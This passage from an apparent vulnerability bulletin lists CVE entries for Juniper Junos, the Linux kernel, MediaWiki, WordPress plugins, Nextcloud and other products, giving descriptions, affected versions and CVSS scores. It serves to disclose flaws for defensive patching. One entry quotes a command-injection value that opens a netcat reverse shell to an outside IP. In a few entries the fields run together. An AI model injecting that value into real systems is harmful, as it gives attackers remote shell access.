* 22.4 versions earlier than 22.4R2-S2, 22.4R3;
* 23.2 versions earlier than 23.2R1-S1, 23.2R2.
Published: 2024-01-12 | CVSS: 6.5 | CVE-2024-21587 | Source: sirt@juniper.net

juniper -- junos
A Missing Release of Memory after Effective Lifetime vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on MX Series allows an adjacent, unauthenticated attacker to cause a Denial of Service (DoS). If an MX Series device receives PTP packets on an MPC3E that doesn't support PTP, this causes a memory leak which will result in unpredictable behavior and ultimately in an MPC crash and restart. To monitor for this issue, please use the following FPC vty level commands: 'show heap' shows an increase in "LAN buffer" utilization and 'show clksync ptp nbr-upd-info' shows a non-zero "Pending PFEs" counter.
This issue affects Juniper Networks Junos OS on MX Series with MPC3E:
* All versions earlier than 20.4R3-S3;
* 21.1 versions earlier than 21.1R3-S4;
* 21.2 versions earlier than 21.2R3;
* 21.3 versions earlier than 21.3R2-S1, 21.3R3;
* 21.4 versions earlier than 21.4R2;
* 22.1 versions earlier than 22.1R2.
Published: 2024-01-12 | CVSS: 6.5 | CVE-2024-21599 | Source: sirt@juniper.net

juniper -- junos
An Improper Neutralization of Equivalent Special Elements vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on PTX Series allows an unauthenticated, adjacent attacker to cause a Denial of Service (DoS). When MPLS packets are meant to be sent to a flexible tunnel interface (FTI) and the FTI tunnel is down, these will hit the reject NH, due to which the packets get sent to the CPU and cause a host path wedge condition. This will cause the FPC to hang and requires a manual restart to recover. Please note that this issue specifically affects PTX1000, PTX3000, PTX5000 with FPC3, PTX10002-60C, and PTX10008/16 with LC110x. Other PTX Series devices and Line Cards (LC) are not affected. The following log message can be seen when the issue occurs:
Cmerror Op Set: Host Loopback: HOST LOOPBACK WEDGE DETECTED IN PATH ID <id> (URI: /fpc/<fpc>/pfe/<pfe>/cm/<cm>/Host_Loopback/<cm>/HOST_LOOPBACK_MAKE_CMERROR_ID[<id>])
This issue affects Juniper Networks Junos OS:
* All versions earlier than 20.4R3-S8;
* 21.1 versions earlier than 21.1R3-S4;
* 21.2 versions earlier than 21.2R3-S6;
* 21.3 versions earlier than 21.3R3-S3;
* 21.4 versions earlier than 21.4R3-S5;
* 22.1 versions earlier than 22.1R2-S2, 22.1R3;
* 22.2 versions earlier than 22.2R2-S1, 22.2R3.
Published: 2024-01-12 | CVSS: 6.5 | CVE-2024-21600 | Source: sirt@juniper.net

juniper -- junos
An Improper Check for Unusual or Exceptional Conditions vulnerability in the kernel of Juniper Networks Junos OS on MX Series allows a network-based attacker with low privileges to cause a denial of service. If a scaled configuration for Source class usage (SCU) / destination class usage (DCU) (more than 10 route classes) is present and the SCU/DCU statistics are gathered by executing specific SNMP requests or CLI commands, a 'vmcore' for the RE kernel will be seen, which leads to a device restart. Continued exploitation of this issue will lead to a sustained DoS. This issue only affects MX Series devices with MPC10, MPC11 or LC9600, and MX304. No other MX Series devices are affected.
This issue affects Juniper Networks Junos OS:
* All versions earlier than 20.4R3-S9;
* 21.2 versions earlier than 21.2R3-S6;
* 21.3 versions earlier than 21.3R3-S5;
* 21.4 versions earlier than 21.4R3;
* 22.1 versions earlier than 22.1R3;
* 22.2 versions earlier than 22.2R2;
* 22.3 versions earlier than 22.3R2.
Published: 2024-01-12 | CVSS: 6.5 | CVE-2024-21603 | Source: sirt@juniper.net

juniper -- junos
A Missing Release of Memory after Effective Lifetime vulnerability in Routing Protocol Daemon (RPD) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, adjacent attacker to cause an rpd crash, leading to Denial of Service (DoS). On all Junos OS and Junos OS Evolved platforms, when traffic engineering is enabled for OSPF or ISIS, and a link flaps, a patroot memory leak is observed. This memory leak, over time, will lead to an rpd crash and restart. The memory usage can be monitored using the below command.
user@host> show task memory detail | match patroot
This issue affects Juniper Networks Junos OS:
* All versions earlier than 21.2R3-S3;
* 21.3 versions earlier than 21.3R3-S5;
* 21.4 versions earlier than 21.4R3-S3;
* 22.1 versions earlier than 22.1R3;
* 22.2 versions earlier than 22.2R3.
Juniper Networks Junos OS Evolved:
* All versions earlier than 21.3R3-S5-EVO;
* 21.4 versions earlier than 21.4R3-EVO;
* 22.1 versions earlier than 22.1R3-EVO;
* 22.2 versions earlier than 22.2R3-EVO.
Published: 2024-01-12 | CVSS: 6.5 | CVE-2024-21613 | Source: sirt@juniper.net

juniper -- junos
An Incomplete Cleanup vulnerability in the Nonstop active routing (NSR) component of Juniper Networks Junos OS allows an adjacent, unauthenticated attacker to cause a memory leak leading to Denial of Service (DoS). On all Junos OS platforms, when NSR is enabled, a BGP flap will cause a memory leak. A manual reboot of the system will restore the services. The memory usage can be monitored using the below commands.
user@host> show chassis routing-engine no-forwarding
user@host> show system memory | no-more
This issue affects Juniper Networks Junos OS:
* 21.2 versions earlier than 21.2R3-S5;
* 21.3 versions earlier than 21.3R3-S4;
* 21.4 versions earlier than 21.4R3-S4;
* 22.1 versions earlier than 22.1R3-S2;
* 22.2 versions earlier than 22.2R3-S2;
* 22.3 versions earlier than 22.3R2-S1, 22.3R3;
* 22.4 versions earlier than 22.4R1-S2, 22.4R2.
This issue does not affect Junos OS versions earlier than 20.4R3-S7.
Published: 2024-01-12 | CVSS: 6.5 | CVE-2024-21617 | Source: sirt@juniper.net

juniper -- junos
An Improper Handling of Exceptional Conditions vulnerability in BGP session processing of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated network-based attacker, using specific timing outside the attacker's control, to flap BGP sessions and cause the routing protocol daemon (rpd) process to crash and restart, leading to a Denial of Service (DoS) condition. Continued BGP session flapping will create a sustained Denial of Service (DoS) condition. This issue only affects routers configured with non-stop routing (NSR) enabled. Graceful Restart (GR) helper mode, enabled by default, is also required for this issue to be exploitable. Note: NSR is not supported on the SRX Series and is therefore not affected by this vulnerability. When the BGP session flaps on the NSR-enabled router, the device enters GR-helper/LLGR-helper mode due to the peer having negotiated GR/LLGR-restarter capability and the backup BGP requests for replication of the GR/LLGR-helper session, master BGP schedules, and initiates replication of GR/LLGR stale routes to the backup BGP. In this state, if the BGP session with the BGP peer comes up again, unsolicited replication is initiated for the peer without cleaning up the ongoing GR/LLGR-helper mode replication. These two parallel instances of replication for the same peer lead to the assert if the BGP session flaps again.
This issue affects Juniper Networks Junos OS:
* All versions earlier than 20.4R3-S9;
* 21.2 versions earlier than 21.2R3-S7;
* 21.3 versions earlier than 21.3R3-S5;
* 21.4 versions earlier than 21.4R3-S5;
* 22.1 versions earlier than 22.1R3-S4;
* 22.2 versions earlier than 22.2R3-S3;
* 22.3 versions earlier than 22.3R3-S1;
* 22.4 versions earlier than 22.4R2-S2, 22.4R3;
* 23.2 versions earlier than 23.2R1-S1, 23.2R2.
Juniper Networks Junos OS Evolved:
* All versions earlier than 21.3R3-S5-EVO;
* 21.4 versions earlier than 21.4R3-S5-EVO;
* 22.1 versions earlier than 22.1R3-S4-EVO;
* 22.2 versions earlier than 22.2R3-S3-EVO;
* 22.3 versions earlier than 22.3R3-S1-EVO;
* 22.4 versions earlier than 22.4R2-S2-EVO, 22.4R3-EVO;
* 23.2 versions earlier than 23.2R1-S1-EVO, 23.2R2-EVO.
Published: 2024-01-12 | CVSS: 5.9 | CVE-2024-21585 | Source: sirt@juniper.net

juniper -- junos
A Heap-based Buffer Overflow vulnerability in the Network Services Daemon (NSD) of Juniper Networks Junos OS allows an authenticated, low-privileged, local attacker to cause a Denial of Service (DoS). On an SRX 5000 Series device, when executing a specific command repeatedly, memory is corrupted, which leads to a Flow Processing Daemon (flowd) crash. The NSD process has to be restarted to restore services. If this issue occurs, it can be checked with the following command:
user@host> request security policies check
The following log message can also be observed:
Error: policies are out of sync for PFE node<number>.fpc<number>.pic<number>.
This issue affects Juniper Networks Junos OS on SRX 5000 Series:
* All versions earlier than 20.4R3-S6;
* 21.1 versions earlier than 21.1R3-S5;
* 21.2 versions earlier than 21.2R3-S4;
* 21.3 versions earlier than 21.3R3-S3;
* 21.4 versions earlier than 21.4R3-S3;
* 22.1 versions earlier than 22.1R3-S1;
* 22.2 versions earlier than 22.2R3;
* 22.3 versions earlier than 22.3R2.
Published: 2024-01-12 | CVSS: 5.5 | CVE-2024-21594 | Source: sirt@juniper.net

juniper -- junos
A Heap-based Buffer Overflow vulnerability in the Routing Protocol Daemon (RPD) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). If an attacker sends a specific BGP UPDATE message to the device, this will cause a memory overwrite and therefore an RPD crash and restart in the backup Routing Engine (RE). Continued receipt of these packets will cause a sustained Denial of Service (DoS) condition in the backup RE. The primary RE is not impacted by this issue and there is no impact on traffic. This issue only affects devices with NSR enabled. This issue requires an attacker to have an established BGP session to a system affected by the issue. This issue affects both eBGP and iBGP implementations.
This issue affects Juniper Networks Junos OS:
* All versions earlier than 20.4R3-S9;
* 21.2 versions earlier than 21.2R3-S7;
* 21.3 versions earlier than 21.3R3-S5;
* 21.4 versions earlier than 21.4R3-S5;
* 22.1 versions earlier than 22.1R3-S4;
* 22.2 versions earlier than 22.2R3-S2;
* 22.3 versions earlier than 22.3R3-S1;
* 22.4 versions earlier than 22.4R2-S2, 22.4R3;
* 23.1 versions earlier than 23.1R2;
* 23.2 versions earlier than 23.2R1-S2, 23.2R2.
Juniper Networks Junos OS Evolved:
* All versions earlier than 21.3R3-S5-EVO;
* 21.4-EVO versions earlier than 21.4R3-S5-EVO;
* 22.1-EVO versions earlier than 22.1R3-S4-EVO;
* 22.2-EVO versions earlier than 22.2R3-S2-EVO;
* 22.3-EVO versions later than 22.3R1-EVO;
* 22.4-EVO versions earlier than 22.4R2-S2-EVO, 22.4R3-EVO;
* 23.1-EVO versions earlier than 23.1R2-EVO;
* 23.2-EVO versions earlier than 23.2R1-S2-EVO, 23.2R2-EVO.
Published: 2024-01-12 | CVSS: 5.3 | CVE-2024-21596 | Source: sirt@juniper.net

juniper -- junos
A Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability in the Flow-processing Daemon (flowd) of Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). On SRX Series devices, when two different threads try to simultaneously process a queue which is used for TCP events, flowd will crash. One of these threads cannot be triggered externally, so the exploitation of this race condition is outside the attacker's direct control. Continued exploitation of this issue will lead to a sustained DoS.
This issue affects Juniper Networks Junos OS:
* 21.2 versions earlier than 21.2R3-S5;
* 21.3 versions earlier than 21.3R3-S5;
* 21.4 versions earlier than 21.4R3-S4;
* 22.1 versions earlier than 22.1R3-S3;
* 22.2 versions earlier than 22.2R3-S1;
* 22.3 versions earlier than 22.3R2-S2, 22.3R3;
* 22.4 versions earlier than 22.4R2-S1, 22.4R3.
This issue does not affect Juniper Networks Junos OS versions earlier than 21.2R1.
Published: 2024-01-12 | CVSS: 5.9 | CVE-2024-21601 | Source: sirt@juniper.net

juniper -- junos
An Unsupported Feature in the UI vulnerability in Juniper Networks Junos OS on MX Series and EX9200 Series allows an unauthenticated, network-based attacker to cause partial impact to the integrity of the device. If the "tcp-reset" option is added to the "reject" action in an IPv6 filter which matches on "payload-protocol", packets are permitted instead of rejected. This happens because the payload-protocol match criteria is not supported in the kernel filter, causing it to accept all packets without taking any other action. As a fix, the payload-protocol match will be treated the same as a "next-header" match to avoid this filter bypass. This issue doesn't affect IPv4 firewall filters.
This issue affects Juniper Networks Junos OS on MX Series and EX9200 Series:
* All versions earlier than 20.4R3-S7;
* 21.1 versions earlier than 21.1R3-S5;
* 21.2 versions earlier than 21.2R3-S5;
* 21.3 versions earlier than 21.3R3-S4;
* 21.4 versions earlier than 21.4R3-S4;
* 22.1 versions earlier than 22.1R3-S2;
* 22.2 versions earlier than 22.2R3-S2;
* 22.3 versions earlier than 22.3R2-S2, 22.3R3;
* 22.4 versions earlier than 22.4R1-S2, 22.4R2-S2, 22.4R3.
Published: 2024-01-12 | CVSS: 5.3 | CVE-2024-21607 | Source: sirt@juniper.net

jupyterlab -- jupyterlab
JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. This vulnerability depends on user interaction by opening a malicious Markdown file using the JupyterLab preview feature. A malicious user can access any data that the attacked user has access to, as well as perform arbitrary requests acting as the attacked user. JupyterLab version 4.0.11 has been patched. Users are advised to upgrade. Users unable to upgrade should disable the table of contents extension.
Published: 2024-01-19 | CVSS: 6.5 | CVE-2024-22420 | Source: security-advisories@github.com

karjasoft -- sami_http_server
A vulnerability was found in Karjasoft Sami HTTP Server 2.0. It has been classified as problematic. Affected is an unknown function of the component HTTP HEAD Request Handler. The manipulation leads to denial of service. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250836.
Published: 2024-01-18 | CVSS: 5.3 | CVE-2021-4433 | Source: cna@vuldb.com

keap -- official_opt-in_forms
The Keap Official Opt-in Forms WordPress plugin through 1.0.11 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in multisite setup).
Published: 2024-01-15 | CVSS: 4.8 | CVE-2023-6941 | Source: contact@wpscan.com

kishorkhambu -- wp_custom_widget_area
The WP Custom Widget area WordPress plugin through 1.2.5 does not properly apply capability and nonce checks on any of its AJAX action callback functions, which could allow attackers with subscriber+ privilege to create, delete or modify menus on the site.
Published: 2024-01-15 | CVSS: 4.3 | CVE-2023-6066 | Source: contact@wpscan.com

lenovo -- lenovo_app_store_application
An incorrect permissions vulnerability was reported in the Lenovo App Store app that could allow an attacker to use system resources, resulting in a denial of service.
Published: 2024-01-19 | CVSS: 5.5 | CVE-2023-6450 | Source: psirt@lenovo.com

lenovo -- tablet
A privilege escalation vulnerability was reported in some Lenovo tablet products that could allow local applications access to device identifiers and system commands.
Published: 2024-01-19 | CVSS: 6.8 | CVE-2023-5080 | Source: psirt@lenovo.com

lenovo -- vantage
A privilege escalation vulnerability was reported in Lenovo Vantage that could allow a local attacker with physical access to impersonate Lenovo Vantage Service and execute arbitrary code with elevated privileges.
Published: 2024-01-19 | CVSS: 6.3 | CVE-2023-6044 | Source: psirt@lenovo.com

lesterchan -- wp-postratings
The WP-PostRatings WordPress plugin before 1.86.1 does not sanitise the postratings_image parameter from its options page (wp-admin/admin.php?page=wp-postratings/postratings-options.php). Even though the page is only accessible to administrators, and protected against CSRF attacks, the issue is still exploitable when the unfiltered_html capability is disabled.
Published: 2024-01-16 | CVSS: 4.8 | CVE-2021-25117 | Source: contact@wpscan.com

linux -- kernel
A NULL pointer dereference problem was found in ida_free in lib/idr.c in the Linux Kernel. This issue may allow an attacker using this library to cause a denial of service problem due to a missing check at a function return.
Published: 2024-01-15 | CVSS: 6.5 | CVE-2023-6915 | Source: secalert@redhat.com

linux -- kernel
An out-of-bounds memory read flaw was found in receive_encrypted_standard in fs/smb/client/smb2ops.c in the SMB Client sub-component in the Linux Kernel. This issue occurs due to integer underflow on the memcpy length, leading to a denial of service.
Published: 2024-01-15 | CVSS: 6.8 | CVE-2024-0565 | Source: secalert@redhat.com

linux -- kernel
A flaw was found in the Netfilter subsystem in the Linux kernel. The issue is in the nft_byteorder_eval() function, where the code iterates through a loop and writes to the `dst` array. On each iteration, 8 bytes are written, but `dst` is an array of u32, so each element only has space for 4 bytes. That means every iteration overwrites part of the previous element, corrupting this array of u32. This flaw allows a local user to cause a denial of service or potentially break Netfilter functionality.
Published: 2024-01-18 | CVSS: 6.6 | CVE-2024-0607 | Source: secalert@redhat.com

linux -- kernel
NULL Pointer Dereference vulnerability in openEuler kernel on Linux (network modules) allows Pointer Manipulation. This vulnerability is associated with program files net/sched/sch_cbs.c. This issue affects openEuler kernel: from 4.19.90 before 4.19.90-2401.3.
Published: 2024-01-18 | CVSS: 5.5 | CVE-2021-33630 | Source: securities@openeuler.org

linux -- kernel
Integer Overflow or Wraparound vulnerability in openEuler kernel on Linux (filesystem modules) allows Forced Integer Overflow. This issue affects openEuler kernel: from 4.19.90 before 4.19.90-2401.3, from 5.10.0-60.18.0 before 5.10.0-183.0.0.
Published: 2024-01-18 | CVSS: 5.5 | CVE-2021-33631 | Source: securities@openeuler.org

linux -- kernel
An issue was discovered in drivers/input/input.c in the Linux kernel before 5.17.10. An attacker can cause a denial of service (panic) because input_set_capability mishandles the situation in which an event code falls outside of a bitmap.
Published: 2024-01-12 | CVSS: 5.5 | CVE-2022-48619 | Source: cve@mitre.org

linux -- kernel
A flaw was found in the blkgs destruction path in block/blk-cgroup.c in the Linux kernel, leading to a cgroup blkio memory leakage problem. When a cgroup is being destroyed, cgroup_rstat_flush() is only called at css_release_work_fn(), which is called when the blkcg reference count reaches 0. This circular dependency will prevent blkcg and some blkgs from being freed after they are made offline. This issue may allow an attacker with local access to cause system instability, such as an out of memory error.
Published: 2024-01-12 | CVSS: 5.5 | CVE-2024-0443 | Source: secalert@redhat.com

linux -- kernel
A denial of service vulnerability due to a deadlock was found in sctp_auto_asconf_init in net/sctp/socket.c in the Linux kernel's SCTP subsystem. This flaw allows guests with local user privileges to trigger a deadlock and potentially crash the system.
Published: 2024-01-17 | CVSS: 4.7 | CVE-2024-0639 | Source: secalert@redhat.com

linux -- kernel
A denial of service vulnerability was found in tipc_crypto_key_revoke in net/tipc/crypto.c in the Linux kernel's TIPC subsystem. This flaw allows guests with local user privileges to trigger a deadlock and potentially crash the system.
Published: 2024-01-17 | CVSS: 4.7 | CVE-2024-0641 | Source: secalert@redhat.com

macroturk_software_and_internet_technologies -- macro-belImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Macroturk Software and Internet Technologies Macro-Bel allows Reflected XSS.This issue affects Macro-Bel: before V.1.0.1.2024-01-186.1CVE-2023-7153
iletisim@usom.gov.tr
magneticone -- cart2cart:_magento_to_woocommerce_migrationMissing Authorization vulnerability in MagneticOne Cart2Cart: Magento to WooCommerce Migration.This issue affects Cart2Cart: Magento to WooCommerce Migration: from n/a through 2.0.0.2024-01-175.4CVE-2023-34379
audit@patchstack.com
mailmunch -- constant_contact_formsImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MailMunch Constant Contact Forms by MailMunch allows Stored XSS.This issue affects Constant Contact Forms by MailMunch: from n/a through 2.0.11.2024-01-135.4CVE-2024-22137
audit@patchstack.com
mediawiki -- mediawiki | An issue was discovered in the Cargo extension in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. The Special:Drilldown page allows XSS via artist, album, and position parameters because of applied filter values in drilldown/CargoAppliedFilter.php. | 2024-01-12 | 6.1 | CVE-2024-23173 | cve@mitre.org
mediawiki -- mediawiki | An issue was discovered in the WatchAnalytics extension in MediaWiki before 1.40.2. XSS can occur via the Special:PageStatistics page parameter. | 2024-01-12 | 6.1 | CVE-2024-23177 | cve@mitre.org
mediawiki -- mediawiki | An issue was discovered in the GlobalBlocking extension in MediaWiki before 1.40.2. For a Special:GlobalBlock?uselang=x-xss URI, i18n-based XSS can occur via the parentheses message. This affects subtitle links in buildSubtitleLinks. | 2024-01-12 | 6.1 | CVE-2024-23179 | cve@mitre.org
mediawiki -- mediawiki | An issue was discovered in the CampaignEvents extension in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. The Special:EventDetails page allows XSS via the x-xss language setting for internationalization (i18n). | 2024-01-12 | 5.4 | CVE-2024-23171 | cve@mitre.org
mediawiki -- mediawiki | An issue was discovered in the CheckUser extension in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. XSS can occur via message definitions, e.g., in SpecialCheckUserLog. | 2024-01-12 | 5.4 | CVE-2024-23172 | cve@mitre.org
mediawiki -- mediawiki | An issue was discovered in the PageTriage extension in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. XSS can occur via the rev-deleted-user, pagetriage-tags-quickfilter-label, pagetriage-triage, pagetriage-filter-date-range-format-placeholder, pagetriage-filter-date-range-to, pagetriage-filter-date-range-from, pagetriage-filter-date-range-heading, pagetriage-filter-set-button, or pagetriage-filter-reset-button message. | 2024-01-12 | 5.4 | CVE-2024-23174 | cve@mitre.org
mediawiki -- mediawiki | An issue was discovered in the Phonos extension in MediaWiki before 1.40.2. PhonosButton.js allows i18n-based XSS via the phonos-purge-needed-error message. | 2024-01-12 | 5.4 | CVE-2024-23178 | cve@mitre.org
miczflor -- rpi-jukebox-rfid | A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251540. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-19 | 6.3 | CVE-2024-0714 | cna@vuldb.com
mock -- mock | The Mock software contains a vulnerability wherein an attacker could potentially exploit privilege escalation, enabling the execution of arbitrary code with root user privileges. This weakness stems from the absence of proper sandboxing during the expansion and execution of Jinja2 templates, which may be included in certain configuration parameters. While the Mock documentation advises treating users added to the mock group as privileged, certain build systems invoking mock on behalf of users might inadvertently permit less privileged users to define configuration tags. These tags could then be passed as parameters to mock during execution, potentially leading to the utilization of Jinja2 templates for remote privilege escalation and the execution of arbitrary code as the root user on the build server. | 2024-01-16 | 6.7 | CVE-2023-6395 | secalert@redhat.com
monitorr_1.7.6m -- monitorr_1.7.6m | A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-19 | 4.7 | CVE-2024-0713 | cna@vuldb.com
myeventon -- eventon | The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not properly sanitise and escape a parameter before outputting it back in pages, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2024-01-16 | 6.1 | CVE-2024-0233 | contact@wpscan.com
myeventon -- eventon | The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorisation in an AJAX action, and do not ensure that the post to be updated belongs to the plugin, allowing unauthenticated users to update arbitrary post metadata. | 2024-01-16 | 6.1 | CVE-2024-0238 | contact@wpscan.com
myeventon -- eventon | The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorisation in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog. | 2024-01-16 | 5.3 | CVE-2024-0235 | contact@wpscan.com
myeventon -- eventon | The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorisation in an AJAX action, allowing unauthenticated users to retrieve the settings of arbitrary virtual events, including any meeting password set (for example for Zoom). | 2024-01-16 | 5.3 | CVE-2024-0236 | contact@wpscan.com
myeventon -- eventon | The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorisation in some AJAX actions, allowing unauthenticated users to update virtual events settings, such as meeting URL, moderator, access details, etc. | 2024-01-16 | 5.3 | CVE-2024-0237 | contact@wpscan.com
myeventon -- eventon | The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not sanitize and escape some of their settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-01-16 | 4.8 | CVE-2023-6005 | contact@wpscan.com
myeventon -- eventon | The EventON WordPress plugin before 2.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored HTML Injection attacks even when the unfiltered_html capability is disallowed. | 2024-01-16 | 4.8 | CVE-2023-6046 | contact@wpscan.com
mythemeshop -- url_shortener_by_mythemeshop | Missing Authorization vulnerability in MyThemeShop URL Shortener by MyThemeShop. This issue affects URL Shortener by MyThemeShop: from n/a through 1.0.17. | 2024-01-17 | 5.4 | CVE-2023-23896 | audit@patchstack.com
netapp -- clustered_data_ontap | ONTAP versions 9.4 and higher are susceptible to a vulnerability which when successfully exploited could lead to disclosure of sensitive information to unprivileged attackers when the object-store profiler command is being run by an administrative user. | 2024-01-12 | 6.5 | CVE-2024-21982 | security-alert@netapp.com
nextcloud -- security-advisories | Nextcloud guests app is a utility to create guest users which can only see files shared with them. In affected versions users were able to load the first page of apps they were actually not allowed to access. Depending on the selection of apps installed this may present a permissions bypass. It is recommended that the Guests app is upgraded to 2.4.1, 2.5.1 or 3.0.1. There are no known workarounds for this vulnerability. | 2024-01-18 | 5.4 | CVE-2024-22402 | security-advisories@github.com
nextcloud -- security-advisories | Nextcloud guests app is a utility to create guest users which can only see files shared with them. In affected versions users could change the allowed list of apps, allowing them to use apps that were not intended to be used. It is recommended that the Guests app is upgraded to 2.4.1, 2.5.1 or 3.0.1. There are no known workarounds for this vulnerability. | 2024-01-18 | 4.1 | CVE-2024-22401 | security-advisories@github.com
nextcloud -- security-advisories | Nextcloud files Zip app is a tool to create zip archives from one or multiple files from within Nextcloud. In affected versions users can download "view-only" files by zipping the complete folder. It is recommended that the Files ZIP app is upgraded to 1.2.1, 1.4.1, or 1.5.0. Users unable to upgrade should disable the file zip app. | 2024-01-18 | 4.1 | CVE-2024-22404 | security-advisories@github.com
nextend -- smart_slider_3 | Deserialization of Untrusted Data vulnerability in Nextend Smart Slider 3. This issue affects Smart Slider 3: from n/a through 3.5.1.9. | 2024-01-19 | 4.3 | CVE-2022-45845 | audit@patchstack.com
nickmomrik -- simple_post | The Simple Post WordPress plugin through 1.1 does not sanitize user input when an authenticated user Text value, then it does not escape these values when outputting to the browser leading to an Authenticated Stored XSS Cross-Site Scripting issue. | 2024-01-16 | 5.4 | CVE-2021-24567 | contact@wpscan.com
notary_project -- notary_project | The Notary Project is a set of specifications and tools intended to provide a cross-industry standard for securing software supply chains by using authentic container images and other OCI artifacts. An external actor with control of a compromised container registry can provide outdated versions of OCI artifacts, such as Images. This could lead artifact consumers with relaxed trust policies (such as `permissive` instead of `strict`) to potentially use artifacts with signatures that are no longer valid, making them susceptible to any exploits those artifacts may contain. In Notary Project, an artifact publisher can control the validity period of an artifact by specifying signature expiry during the signing process. Using shorter signature validity periods along with processes to periodically resign artifacts allows artifact producers to ensure that their consumers will only receive up-to-date artifacts. Artifact consumers should correspondingly use a `strict` or equivalent trust policy that enforces signature expiry. Together these steps enable use of up-to-date artifacts and safeguard against rollback attacks in the event of registry compromise. The Notary Project offers various signature validation options such as `permissive`, `audit` and `skip` to support various scenarios. These scenarios include 1) situations demanding urgent workload deployment, necessitating the bypassing of expired or revoked signatures; 2) auditing of artifacts lacking signatures without interrupting workload; and 3) skipping of verification for specific images that might have undergone validation through alternative mechanisms. Additionally, the Notary Project supports revocation to ensure signature freshness. Artifact publishers can sign with short-lived certificates and revoke older certificates when necessary. This revocation serves as a signal to inform artifact consumers that the corresponding unexpired artifact is no longer approved by the publisher. This enables the artifact publisher to control the validity of the signature independently of their ability to manage artifacts in a compromised registry. | 2024-01-19 | 4 | CVE-2024-23332 | security-advisories@github.com
novel-plus -- novel-plus | A vulnerability has been found in Novel-Plus 4.3.0-RC1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /novel/bookSetting/list. The manipulation of the argument sort leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251383. | 2024-01-18 | 5.5 | CVE-2024-0655 | cna@vuldb.com
nozomi -- check_point_IoT_integration | A missing authentication check in the WebSocket channel used for the Check Point IoT integration in Nozomi Networks Guardian and CMC may allow an unauthenticated attacker to obtain assets data without authentication. Malicious unauthenticated users with knowledge of the underlying system may be able to extract asset information. | 2024-01-15 | 5.3 | CVE-2023-5253 | prodsec@nozominetworks.com
nvidia -- dgx_a100_firmware | NVIDIA DGX A100 SBIOS contains a vulnerability where a user may cause a dynamic variable evaluation by local access. A successful exploit of this vulnerability may lead to denial of service. | 2024-01-12 | 5.5 | CVE-2023-31032 | psirt@nvidia.com
obg -- ark_wysiwyg_comment_editor | The ark-commenteditor WordPress plugin through 2.15.6 does not properly sanitise or encode the comments when in Source editor, allowing attackers to inject an iFrame in the page and thus load arbitrary content from any page to the comment section. | 2024-01-16 | 5.3 | CVE-2021-4227 | contact@wpscan.com
opcua -- servertoolkit | OPCUAServerToolkit will write a log message once an OPC UA client has successfully connected containing the client's self-defined description field. | 2024-01-16 | 5.3 | CVE-2023-7234 | ics-cert@hq.dhs.gov
open_edX_platform -- open_edX_platform | Open edX Platform is a service-oriented platform for authoring and delivering online learning. A user with a JWT and more limited scopes could call endpoints exceeding their access. This vulnerability has been patched in commit 019888f. | 2024-01-13 | 6.4 | CVE-2024-22209 | security-advisories@github.com
openkm -- openkm | A Stored Cross-Site Scripting (XSS) vulnerability exists in OpenKM version 7.1.40 (dbb6e88) with Professional Extension that allows an authenticated user to upload a note on a file which acts as a stored XSS payload. Any user who opens the note of a document file will trigger the XSS. | 2024-01-13 | 5.4 | CVE-2023-50072 | cve@mitre.org
